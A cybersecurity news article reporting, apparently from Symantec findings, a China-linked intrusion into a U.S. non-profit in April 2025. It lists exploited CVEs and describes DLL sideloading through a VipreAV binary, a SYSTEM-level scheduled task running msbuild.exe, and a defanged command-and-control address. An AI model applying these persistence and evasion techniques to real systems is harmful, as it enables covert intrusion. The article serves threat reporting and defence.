China-linked threat actors have intensified their focus on influencing American governmental decision-making processes by targeting organizations involved in shaping international policy.
In April 2025, a sophisticated intrusion into a U.S. non-profit organization revealed the persistent efforts of these attackers to establish long-term network access and gather intelligence related to policy matters.
The threat actors demonstrated considerable technical sophistication, employing multiple evasion techniques and exploiting various vulnerabilities to maintain control over the compromised infrastructure for several weeks.
The attack campaign reflects a broader pattern of Chinese state-sponsored espionage targeting policy-influencing institutions.
Initial reconnaissance began on April 5, 2025, when attackers conducted mass vulnerability scans against organizational servers, attempting exploits including CVE-2022-26134 (Atlassian OGNL Injection), CVE-2021-44228 (Log4j), CVE-2017-9805 (Apache Struts), and CVE-2017-17562 (GoAhead RCE).
These scanning activities established the foundation for their subsequent exploitation attempts and network compromise.
Symantec security analysts identified multiple tactical indicators linking this campaign to established Chinese threat groups including Space Pirates, Kelp (Salt Typhoon), and Earth Longzhi, a recognized subgroup of the long-standing APT41 collective.
The forensic evidence pointed directly to China-based attribution through several distinctive attack methodologies.
DLL Sideloading as Primary Persistence Mechanism
The attackers deployed DLL sideloading as their primary persistence mechanism, leveraging a legitimate VipreAV component named vetysafe.exe to execute malicious payload sbamres.dll.
This technique exploits Windows’ dynamic library search order by planting malicious code that legitimate applications automatically load and execute.
The attackers created a scheduled task running every 60 minutes with SYSTEM privileges, executing msbuild.exe to load an unknown XML configuration file containing injected code.
This code subsequently established communication with a command-and-control server at hxxp://38.180.83[.]166/6CDF0FC26CDF0FC2.
The sophisticated approach allowed attackers to maintain persistent access while evading traditional security detection mechanisms, demonstrating evolving capabilities in targeting U.S. policy institutions.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
